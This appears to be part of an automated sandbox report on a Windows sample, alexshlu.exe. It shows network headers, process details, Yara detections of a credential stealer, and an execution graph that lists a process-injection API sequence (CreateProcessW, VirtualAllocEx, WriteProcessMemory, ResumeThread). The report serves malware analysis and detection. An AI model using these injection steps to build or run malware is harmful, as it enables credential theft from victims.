                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=5i7gen8b9knl7o2ac17ngkk2bt; expires=Sun, 13-Apr-2025 04:55:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KicTcL3BqP1d9phBh1jNjsBQNmhtB4MGNz16VjldU7K8zxVpLfxsO0X%2F06VTZzNxCMx%2BVL6foz8ME0Hi%2BAWcookSxX3auOA9dwW%2BS%2Bg%2FhgG9MCXWMIh9d8KB2r%2BuTNv4RDM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb2440f18423f-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2793&min_rtt=1869&rtt_var=1361&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=984&delivery_rate=1562332&cwnd=237&unsent_bytes=0&cid=20437e5482be7f0a&ts=720&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:41 UTC54INData Raw: 33 30 0d 0a 68 6d 39 79 6f 30 35 48 37 31 35 74 2b 67 6f 4d 70 44 73 62 76 70 77 51 6a 70 49 4e 62 64 6d 79 6b 62 53 78 52 59 63 4c 5a 61 58 64 4d 67 3d 3d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 30hm9yo05H715t+goMpDsbvpwQjpINbdmykbSxRYcLZaXdMg==
                                                                                                                                                                                                                                      2024-12-18 11:08:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:06:08:00
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\alexshlu.exe"
                                                                                                                                                                                                                                      Imagebase:0x2a0000
                                                                                                                                                                                                                                      File size:828'416 bytes
                                                                                                                                                                                                                                      MD5 hash:9821FA45714F3B4538CC017320F6F7E5
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                      Start time:06:08:00
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:06:08:00
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\alexshlu.exe"
                                                                                                                                                                                                                                      Imagebase:0x2a0000
                                                                                                                                                                                                                                      File size:828'416 bytes
                                                                                                                                                                                                                                      MD5 hash:9821FA45714F3B4538CC017320F6F7E5
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:4.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:1.2%
                                                                                                                                                                                                                                        Signature Coverage:8.5%
                                                                                                                                                                                                                                        Total number of Nodes:655
                                                                                                                                                                                                                                        Total number of Limit Nodes:9
                                                                                                                                                                                                                                        execution_graph 21068 2b432b 39 API calls _unexpected 20194 2ae32b 20195 2ae333 20194->20195 20213 2b6d94 20195->20213 20197 2ae33e 20220 2a9ab9 20197->20220 20200 2ae353 __RTC_Initialize 20211 2ae3b0 20200->20211 20226 2a9932 20200->20226 20201 2ae3d5 20203 2ae36c 20229 2b5b55 20203->20229 20207 2ae382 std::_Throw_Cpp_error 20262 2ae626 33 API calls 20207->20262 20209 2ae3a5 20263 2b4499 39 API calls 2 library calls 20209->20263 20212 2ae3cd 20211->20212 20264 2ad86f 4 API calls 2 library calls 20211->20264 20214 2b6da3 20213->20214 20215 2b6dc6 20213->20215 20214->20215 20265 2b6211 14 API calls __strnicoll 20214->20265 20215->20197 20217 2b6db6 20266 2b68fc 29 API calls __strnicoll 20217->20266 20219 2b6dc1 20219->20197 20221 2a9ac9 20220->20221 20222 2a9ac5 20220->20222 20223 2a9ad6 ___scrt_release_startup_lock 20221->20223 20267 2ad86f 4 API calls 2 library calls 20221->20267 20222->20200 20223->20200 20225 2a9b3f 20268 2a9947 20226->20268 20230 2b5baf 20229->20230 20231 2b5be7 20230->20231 20233 2b5bd1 20230->20233 20253 2ae377 20230->20253 20276 2bc495 20231->20276 20304 2b6211 14 API calls __strnicoll 20233->20304 20237 2b5bd6 20305 2b68fc 29 API calls __strnicoll 20237->20305 20244 2b5c49 20306 2b6211 14 API calls __strnicoll 20244->20306 20245 2b5c55 20246 2b5cec 39 API calls 20245->20246 20248 2b5c6b 20246->20248 20249 2b5c4e 20248->20249 20250 2b5c8f 20248->20250 20307 2ba897 20249->20307 20313 2c0532 55 API calls 3 library calls 20250->20313 20253->20211 20261 2ae61a InitializeSListHead 20253->20261 20254 2b5c9e 20255 2b5cb0 20254->20255 20256 2b5ca6 20254->20256 20258 2ba897 ___free_lconv_mon 14 API calls 20255->20258 20257 2ba897 ___free_lconv_mon 14 API calls 20256->20257 20259 2b5cae 20257->20259 20258->20259 20260 2ba897 ___free_lconv_mon 14 API calls 20259->20260 20260->20253 20261->20207 20262->20209 20263->20211 20264->20201 20265->20217 20266->20219 20267->20225 20269 2a995d 20268->20269 20270 2a9956 20268->20270 20275 2b5ee8 32 API calls std::ios_base::_Init 20269->20275 20274 2b5f59 32 API calls std::ios_base::_Init 20270->20274 20273 2a993d 20273->20203 20274->20273 20275->20273 20277 2bc49e 20276->20277 20281 2b5bed 20276->20281 20314 2babde 39 API calls 3 library calls 20277->20314 20279 2bc4c1 20315 2bc856 49 API calls 2 library calls 20279->20315 20282 2c0bb6 GetModuleFileNameW 20281->20282 20283 2c0be5 GetLastError 20282->20283 20284 2c0bf6 20282->20284 20323 2b6237 14 API calls 2 library calls 20283->20323 20324 2bbc11 39 API calls __strnicoll 20284->20324 20287 2c0c27 20325 2b0c62 17 API calls 3 library calls 20287->20325 20289 2c0bf1 20316 2a986f 20289->20316 20291 2b5c00 20292 2b5cec 20291->20292 20294 2b5d12 20292->20294 20296 2b5d70 20294->20296 20327 2c0c57 39 API calls 20294->20327 20295 2b5c33 20298 2b5b60 20295->20298 20296->20295 20328 2c0c57 39 API calls 20296->20328 20299 2b5ba3 20298->20299 20300 2b5b71 20298->20300 20299->20244 20299->20245 20300->20299 20329 2bbc50 20300->20329 20303 2ba897 ___free_lconv_mon 14 API calls 20303->20299 20304->20237 20305->20253 20306->20249 20308 2ba8cc 20307->20308 20309 2ba8a2 HeapFree 20307->20309 20308->20253 20309->20308 20310 2ba8b7 GetLastError 20309->20310 20311 2ba8c4 __dosmaperr 20310->20311 20338 2b6211 14 API calls __strnicoll 20311->20338 20313->20254 20314->20279 20315->20281 20317 2a9878 IsProcessorFeaturePresent 20316->20317 20318 2a9877 20316->20318 20320 2ad3cd 20317->20320 20318->20291 20326 2ad4b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20320->20326 20322 2ad4b0 20322->20291 20323->20289 20324->20287 20325->20289 20326->20322 20327->20294 20328->20296 20334 2bbc5d __strnicoll 20329->20334 20330 2bbc9d 20337 2b6211 14 API calls __strnicoll 20330->20337 20331 2bbc88 RtlAllocateHeap 20333 2b5b9a 20331->20333 20331->20334 20333->20303 20334->20330 20334->20331 20336 2b439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20334->20336 20336->20334 20337->20333 20338->20308 21070 2ae52b 21 API calls CallUnexpected 20993 2aea29 54 API calls 2 library calls 21073 2be13b 43 API calls 2 library calls 21074 2c913f 20 API calls 21075 2ae13c GetModuleHandleW GetProcAddress GetProcAddress 20998 2a2c30 14 API calls ___vcrt_freefls@4 21002 2bc835 LeaveCriticalSection std::_Lockit::~_Lockit 21078 2a9709 77 API calls std::ios_base::_Init 21079 2c9b05 IsProcessorFeaturePresent 21005 2aee00 40 API calls 5 library calls 21080 2a9500 49 API calls 3 library calls 21081 2a1f00 111 API calls 2 library calls 21008 2c6015 49 API calls 21011 2ab011 31 API calls 21084 2ac311 43 API calls _Ungetc 21092 2b1b63 66 API calls 21094 2a2f60 20 API calls 2 library calls 21017 2ab27f 45 API calls 2 library calls 21096 2ae572 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 20702 2a1b70 GetPEB 20726 2a1000 20702->20726 20705 2a1ea6 20709 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20705->20709 20706 2a1bdc GetFileSize 20707 2a1e82 CloseHandle 20706->20707 20708 2a1bf0 20706->20708 20707->20705 20711 2a1bf8 ReadFile 20708->20711 20710 2a1eb4 20709->20710 20712 2a1e79 20711->20712 20713 2a1c15 CloseHandle 20711->20713 20712->20707 20714 2a1e8b 20713->20714 20725 2a1c30 error_info_injector codecvt _strlen 20713->20725 20737 2a1ab0 20714->20737 20716 2a1ebe 20749 2a34f0 30 API calls std::_Throw_Cpp_error 20716->20749 20718 2a1ec3 20750 2b690c 29 API calls 2 library calls 20718->20750 20719 2a97fb RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20719->20725 20725->20714 20725->20716 20725->20718 20725->20719 20735 2a1290 20726->20735 20736 2a102d error_info_injector codecvt _strlen 20726->20736 20727 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20728 2a12a9 CreateFileA 20727->20728 20728->20705 20728->20706 20729 2a12b3 20751 2a34f0 30 API calls std::_Throw_Cpp_error 20729->20751 20731 2a12b8 20752 2b690c 29 API calls 2 library calls 20731->20752 20732 2a97fb RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20732->20736 20735->20727 20736->20729 20736->20731 20736->20732 20736->20735 20738 2a1000 30 API calls 20737->20738 20739 2a1ad8 FreeConsole 20738->20739 20753 2a12c0 20739->20753 20742 2a12c0 78 API calls 20743 2a1b0a 20742->20743 20744 2a1000 30 API calls 20743->20744 20745 2a1b1d VirtualProtect 20744->20745 20746 2a1b36 20745->20746 20747 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20746->20747 20748 2a1b40 20747->20748 20748->20705 20755 2a12f0 20753->20755 20754 2a149f 20756 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20754->20756 20755->20754 20759 2a14c0 20755->20759 20758 2a14ad 20756->20758 20758->20742 20760 2a14df _strlen 20759->20760 20765 2a1567 20760->20765 20773 2a154e 20760->20773 20781 2a2940 39 API calls 3 library calls 20760->20781 20761 2a1750 20783 2a3120 38 API calls std::ios_base::_Init 20761->20783 20764 2a1777 20784 2a3190 30 API calls std::ios_base::_Init 20764->20784 20765->20773 20777 2ab367 20765->20777 20767 2a1729 20771 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20767->20771 20768 2a1719 20768->20767 20782 2a3b30 39 API calls 3 library calls 20768->20782 20769 2a1787 20785 2ae6da RaiseException 20769->20785 20774 2a1746 20771->20774 20773->20761 20773->20768 20774->20754 20775 2a1792 20778 2ab376 20777->20778 20779 2ab389 codecvt 20777->20779 20778->20773 20779->20778 20780 2b7f3a 69 API calls 20779->20780 20780->20778 20781->20765 20782->20767 20783->20764 20784->20769 20785->20775 21019 2a9670 40 API calls 21097 2a2d70 LCMapStringEx __Towlower 21101 2c0170 42 API calls 3 library calls 21020 2a9e77 16 API calls 2 library calls 21021 2bc275 GetProcessHeap 21102 2aed75 8 API calls 21104 2b0d49 47 API calls 4 library calls 21024 2b124f 7 API calls ___scrt_uninitialize_crt 21026 2ab447 70 API calls 21109 2b995f 55 API calls 2 library calls 21029 2a3050 29 API calls ___std_exception_copy 21030 2a2e50 21 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21110 2a3350 30 API calls 4 library calls 21113 2abb54 16 API calls 20339 2d61a9 20340 2d61df 20339->20340 20341 2d632c GetPEB 20340->20341 20342 2d633e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20340->20342 20341->20342 20342->20340 20343 2d63e5 WriteProcessMemory 20342->20343 20344 2d642a 20343->20344 20345 2d646c WriteProcessMemory Wow64SetThreadContext ResumeThread 20344->20345 20346 2d642f WriteProcessMemory 20344->20346 20346->20344 21032 2a34a0 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21117 2a17a0 75 API calls 3 library calls 21034 2a96a1 32 API calls std::ios_base::_Init 21036 2bfebe 44 API calls 3 library calls 21119 2a77b0 67 API calls 3 library calls 21121 2bb3b7 FreeLibrary 21040 2a968b 33 API calls std::ios_base::_Init 21122 2b6b82 7 API calls 21041 2a4880 69 API calls 3 library calls 21043 2bc287 34 API calls 2 library calls 21123 2ad984 49 API calls _unexpected 21125 2ab598 66 API calls 21046 2ada93 DecodePointer 21048 2a2c90 GetStringTypeW __Getwctypes 21050 2c0290 41 API calls 3 library calls 21051 2b1494 73 API calls 2 library calls 21053 2b14ec GetCommandLineA GetCommandLineW 21055 2ab0e0 46 API calls 2 library calls 21129 2bf5e1 41 API calls 3 library calls 21131 2ac1e1 70 API calls 2 library calls 21132 2ab5e6 68 API calls 21133 2ac3f8 56 API calls 2 library calls 21134 2a9bff DeleteCriticalSection 20347 2a7af0 20348 2a7b18 20347->20348 20373 2a8290 20348->20373 20350 2a8277 20456 2a34f0 30 API calls std::_Throw_Cpp_error 20350->20456 20353 2a7c08 20357 2a97fb std::ios_base::_Init 3 API calls 20353->20357 20354 2a7bf1 20444 2a97fb 20354->20444 20355 2a827c 20457 2b690c 29 API calls 2 library calls 20355->20457 20360 2a7bb6 __fread_nolock 20357->20360 20392 2a8380 20360->20392 20362 2a7c74 codecvt 20363 2a7d7f 20362->20363 20364 2a8272 20362->20364 20369 2a8162 error_info_injector 20363->20369 20411 2aaef7 20363->20411 20423 2aaf05 20363->20423 20432 2aaee7 20363->20432 20455 2a5fd0 69 API calls 7 library calls 20364->20455 20366 2a824c error_info_injector 20367 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20366->20367 20368 2a8268 20367->20368 20369->20355 20369->20366 20458 2a9b82 20373->20458 20376 2a9b82 std::_Lockit::_Lockit 7 API calls 20379 2a82cf 20376->20379 20377 2a8343 20464 2a9bb3 20377->20464 20378 2a82f1 20378->20377 20471 2a8470 66 API calls 5 library calls 20378->20471 20382 2a9bb3 std::_Lockit::~_Lockit 2 API calls 20379->20382 20382->20378 20383 2a835f 20385 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20383->20385 20384 2a8332 20386 2a833a 20384->20386 20387 2a8374 20384->20387 20388 2a7b73 20385->20388 20472 2a9c26 RaiseException _Yarn Concurrency::cancel_current_task 20386->20472 20473 2a2b60 RaiseException CallUnexpected 20387->20473 20388->20350 20388->20353 20388->20354 20388->20360 20393 2a9b82 std::_Lockit::_Lockit 7 API calls 20392->20393 20394 2a83a1 20393->20394 20395 2a9b82 std::_Lockit::_Lockit 7 API calls 20394->20395 20401 2a83e1 20394->20401 20396 2a83bf 20395->20396 20398 2a9bb3 std::_Lockit::~_Lockit 2 API calls 20396->20398 20397 2a9bb3 std::_Lockit::~_Lockit 2 API calls 20399 2a844f 20397->20399 20398->20401 20402 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20399->20402 20409 2a8433 20401->20409 20478 2a8710 66 API calls 4 library calls 20401->20478 20406 2a845a 20402->20406 20403 2a8422 20404 2a842a 20403->20404 20405 2a8464 20403->20405 20479 2a9c26 RaiseException _Yarn Concurrency::cancel_current_task 20404->20479 20480 2a2b60 RaiseException CallUnexpected 20405->20480 20406->20362 20409->20397 20412 2aaefe 20411->20412 20415 2aaf4a 20411->20415 20484 2b13b8 LeaveCriticalSection 20412->20484 20414 2aaed5 20414->20363 20415->20414 20416 2aafce 20415->20416 20417 2aafaf 20415->20417 20419 2aafc0 20416->20419 20485 2b7f3a 20416->20485 20417->20419 20481 2aa866 20417->20481 20421 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20419->20421 20422 2ab00d 20421->20422 20422->20363 20426 2aaf28 20423->20426 20428 2aaf21 20423->20428 20424 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20425 2ab00d 20424->20425 20425->20363 20426->20428 20429 2aafce 20426->20429 20430 2aaf6e 20426->20430 20427 2aa866 _Fputc 68 API calls 20427->20428 20428->20424 20429->20428 20431 2b7f3a 69 API calls 20429->20431 20430->20427 20430->20428 20431->20428 20433 2aaeee 20432->20433 20438 2aaf3a 20432->20438 20698 2b13a4 EnterCriticalSection 20433->20698 20435 2aaef3 20435->20363 20436 2aaf3e 20437 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20436->20437 20439 2ab00d 20437->20439 20438->20436 20441 2aafce 20438->20441 20442 2aaf6e 20438->20442 20439->20363 20440 2aa866 _Fputc 68 API calls 20440->20436 20441->20436 20443 2b7f3a 69 API calls 20441->20443 20442->20436 20442->20440 20443->20436 20445 2a9800 _Yarn 20444->20445 20446 2a981a 20445->20446 20448 2a981c 20445->20448 20699 2b439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20445->20699 20446->20360 20449 2ad2be std::ios_base::_Init 20448->20449 20451 2a9826 Concurrency::cancel_current_task 20448->20451 20701 2ae6da RaiseException 20449->20701 20700 2ae6da RaiseException 20451->20700 20452 2ad2da 20454 2aa3cb 20455->20350 20459 2a9b98 20458->20459 20460 2a9b91 20458->20460 20462 2a82b1 20459->20462 20475 2ada48 EnterCriticalSection 20459->20475 20474 2b6c22 6 API calls 2 library calls 20460->20474 20462->20376 20462->20378 20465 2b6c30 20464->20465 20466 2a9bbd 20464->20466 20477 2b6c0b LeaveCriticalSection 20465->20477 20467 2a9bd0 20466->20467 20476 2ada56 LeaveCriticalSection 20466->20476 20467->20383 20470 2b6c37 20470->20383 20471->20384 20472->20377 20474->20462 20475->20462 20476->20467 20477->20470 20478->20403 20479->20409 20489 2b770f 20481->20489 20483 2aa876 20483->20419 20484->20414 20486 2b7f4d _Fputc 20485->20486 20635 2b811b 20486->20635 20488 2b7f62 _Fputc 20488->20419 20490 2b7722 _Fputc 20489->20490 20493 2b7770 20490->20493 20492 2b7731 _Fputc 20492->20483 20494 2b777c ___scrt_is_nonwritable_in_current_image 20493->20494 20495 2b77a9 20494->20495 20496 2b7785 20494->20496 20509 2b13a4 EnterCriticalSection 20495->20509 20515 2b6aa5 29 API calls 2 library calls 20496->20515 20499 2b77b2 20508 2b77c7 20499->20508 20516 2be079 20499->20516 20500 2b779e _Fputc 20500->20492 20502 2b7833 20523 2b6aa5 29 API calls 2 library calls 20502->20523 20503 2b7864 20510 2b7743 20503->20510 20506 2b7870 20524 2b789c LeaveCriticalSection __fread_nolock 20506->20524 20508->20502 20508->20503 20509->20499 20511 2b7762 20510->20511 20512 2b7751 20510->20512 20511->20506 20525 2c3363 20512->20525 20514 2b775d 20514->20506 20515->20500 20517 2be09a 20516->20517 20518 2be085 20516->20518 20517->20508 20633 2b6211 14 API calls __strnicoll 20518->20633 20520 2be08a 20634 2b68fc 29 API calls __strnicoll 20520->20634 20522 2be095 20522->20508 20523->20500 20524->20500 20526 2c33fe 20525->20526 20527 2be079 __fread_nolock 29 API calls 20526->20527 20529 2c340b 20527->20529 20528 2c3417 20528->20514 20529->20528 20530 2c3463 20529->20530 20549 2c3379 31 API calls _Fputc 20529->20549 20530->20528 20537 2c34c5 20530->20537 20550 2bd0ab 20530->20550 20534 2c34b8 20534->20537 20557 2c538f 14 API calls 2 library calls 20534->20557 20538 2c35ee 20537->20538 20539 2be079 __fread_nolock 29 API calls 20538->20539 20540 2c35fd 20539->20540 20541 2c3610 20540->20541 20542 2c36a3 20540->20542 20544 2c362d 20541->20544 20547 2c3654 20541->20547 20558 2c273c 20542->20558 20545 2c273c _Fputc 64 API calls 20544->20545 20546 2c34d6 20545->20546 20546->20514 20547->20546 20569 2c1250 33 API calls _Fputc 20547->20569 20549->20530 20551 2bd0b7 _Fputc 20550->20551 20552 2bd0e1 20551->20552 20553 2be079 __fread_nolock 29 API calls 20551->20553 20552->20534 20554 2bd0d2 20553->20554 20621 2c6024 20554->20621 20556 2bd0d8 20556->20534 20557->20537 20560 2c2748 ___scrt_is_nonwritable_in_current_image 20558->20560 20559 2c2750 20559->20546 20560->20559 20561 2c2789 20560->20561 20563 2c27cf 20560->20563 20599 2b6aa5 29 API calls 2 library calls 20561->20599 20570 2c2196 EnterCriticalSection 20563->20570 20565 2c27d5 20566 2c27f3 20565->20566 20571 2c2520 20565->20571 20600 2c2845 LeaveCriticalSection __fread_nolock 20566->20600 20569->20546 20570->20565 20572 2c2548 20571->20572 20596 2c256b __fread_nolock 20571->20596 20573 2c254c 20572->20573 20575 2c25a7 20572->20575 20615 2b6aa5 29 API calls 2 library calls 20573->20615 20576 2c25c5 20575->20576 20616 2c12d0 31 API calls __fread_nolock 20575->20616 20601 2c284d 20576->20601 20580 2c25dd 20584 2c260c 20580->20584 20589 2c25e5 20580->20589 20581 2c2624 20582 2c268d WriteFile 20581->20582 20583 2c2638 20581->20583 20585 2c26af GetLastError 20582->20585 20598 2c261f 20582->20598 20587 2c2679 20583->20587 20588 2c2640 20583->20588 20618 2c28ca 45 API calls 4 library calls 20584->20618 20585->20598 20608 2c2cf9 20587->20608 20590 2c2665 20588->20590 20591 2c2645 20588->20591 20589->20596 20617 2c2c91 6 API calls _Fputc 20589->20617 20620 2c2ebd 8 API calls 2 library calls 20590->20620 20594 2c264e 20591->20594 20591->20596 20619 2c2dd4 7 API calls 2 library calls 20594->20619 20596->20566 20598->20596 20599->20559 20600->20559 20602 2c6024 __fread_nolock 29 API calls 20601->20602 20604 2c285f 20602->20604 20603 2c25d7 20603->20580 20603->20581 20604->20603 20605 2b1840 _Fputc 39 API calls 20604->20605 20606 2c288d 20604->20606 20605->20606 20606->20603 20607 2c28a7 GetConsoleMode 20606->20607 20607->20603 20612 2c2d08 _Fputc 20608->20612 20609 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20610 2c2dd2 20609->20610 20610->20596 20611 2c2d78 WriteFile 20611->20612 20613 2c2dbb GetLastError 20611->20613 20612->20611 20614 2c2db9 20612->20614 20613->20614 20614->20609 20615->20596 20616->20576 20617->20596 20618->20598 20619->20596 20620->20598 20622 2c603e 20621->20622 20623 2c6031 20621->20623 20626 2c604a 20622->20626 20631 2b6211 14 API calls __strnicoll 20622->20631 20630 2b6211 14 API calls __strnicoll 20623->20630 20625 2c6036 20625->20556 20626->20556 20628 2c606b 20632 2b68fc 29 API calls __strnicoll 20628->20632 20630->20625 20631->20628 20632->20625 20633->20520 20634->20522 20636 2b8129 20635->20636 20637 2b8151 20635->20637 20636->20637 20638 2b8158 20636->20638 20639 2b8136 20636->20639 20637->20488 20643 2b81de 20638->20643 20651 2b6aa5 29 API calls 2 library calls 20639->20651 20644 2b81ea ___scrt_is_nonwritable_in_current_image 20643->20644 20652 2b13a4 EnterCriticalSection 20644->20652 20646 2b81f8 20653 2b8192 20646->20653 20650 2b8190 20650->20488 20651->20637 20652->20646 20661 2bd000 20653->20661 20660 2b822d LeaveCriticalSection __fread_nolock 20660->20650 20662 2bd0ab _Fputc 29 API calls 20661->20662 20663 2bd011 _Fputc 20662->20663 20667 2b81aa 20663->20667 20682 2ba8d1 20663->20682 20666 2ba897 ___free_lconv_mon 14 API calls 20666->20667 20668 2b7f74 20667->20668 20671 2b7f86 20668->20671 20672 2b7faf 20668->20672 20669 2b7f94 20691 2b6aa5 29 API calls 2 library calls 20669->20691 20671->20669 20671->20672 20677 2b7fca codecvt 20671->20677 20678 2bd0e9 20672->20678 20673 2c3363 _Fputc 66 API calls 20673->20677 20675 2be079 __fread_nolock 29 API calls 20675->20677 20676 2c273c _Fputc 64 API calls 20676->20677 20677->20672 20677->20673 20677->20675 20677->20676 20692 2b70cb 20677->20692 20679 2bd0f4 20678->20679 20681 2b81d4 20678->20681 20680 2b70cb ___scrt_uninitialize_crt 64 API calls 20679->20680 20679->20681 20680->20681 20681->20660 20683 2ba90f 20682->20683 20687 2ba8df __strnicoll 20682->20687 20690 2b6211 14 API calls __strnicoll 20683->20690 20685 2ba8fa RtlAllocateHeap 20686 2ba90d 20685->20686 20685->20687 20686->20666 20687->20683 20687->20685 20689 2b439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20687->20689 20689->20687 20690->20686 20691->20672 20693 2b70e4 20692->20693 20697 2b710b 20692->20697 20694 2be079 __fread_nolock 29 API calls 20693->20694 20693->20697 20695 2b7100 20694->20695 20696 2c273c _Fputc 64 API calls 20695->20696 20696->20697 20697->20677 20698->20435 20699->20445 20700->20454 20701->20452 20786 2ae3f0 20787 2ae3fc ___scrt_is_nonwritable_in_current_image 20786->20787 20812 2a9a58 20787->20812 20789 2ae403 20790 2ae55c 20789->20790 20800 2ae42d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20789->20800 20861 2ad86f 4 API calls 2 library calls 20790->20861 20792 2ae563 20862 2b406a 21 API calls CallUnexpected 20792->20862 20794 2ae569 20863 2b4080 21 API calls CallUnexpected 20794->20863 20796 2ae571 20797 2ae44c 20798 2ae4cd 20823 2b65e9 59 API calls 20798->20823 20800->20797 20800->20798 20857 2b40b4 39 API calls 4 library calls 20800->20857 20802 2ae4d3 20824 2a20d0 GetModuleHandleW GetModuleFileNameA 20802->20824 20806 2ae4f4 20806->20792 20807 2ae4f8 20806->20807 20808 2ae501 20807->20808 20859 2b4096 21 API calls CallUnexpected 20807->20859 20860 2a9a91 75 API calls ___scrt_uninitialize_crt 20808->20860 20811 2ae50a 20811->20797 20813 2a9a61 20812->20813 20864 2ad4db IsProcessorFeaturePresent 20813->20864 20815 2a9a6d 20865 2aed89 10 API calls 2 library calls 20815->20865 20817 2a9a72 20818 2a9a76 20817->20818 20866 2b12bf 20817->20866 20818->20789 20821 2a9a8d 20821->20789 20823->20802 20825 2a97fb std::ios_base::_Init 3 API calls 20824->20825 20826 2a2106 20825->20826 20827 2a97fb std::ios_base::_Init 3 API calls 20826->20827 20828 2a2112 20827->20828 20879 2b3e7d 20828->20879 20830 2a2133 20831 2a21fc 20830->20831 20833 2a214a GetCurrentThreadId 20830->20833 20834 2a21e7 20830->20834 20899 2aa1d4 30 API calls 2 library calls 20831->20899 20836 2a21ee 20833->20836 20837 2a2157 20833->20837 20896 2aa1d4 30 API calls 2 library calls 20834->20896 20835 2a2209 20900 2aa1d4 30 API calls 2 library calls 20835->20900 20897 2aa1d4 30 API calls 2 library calls 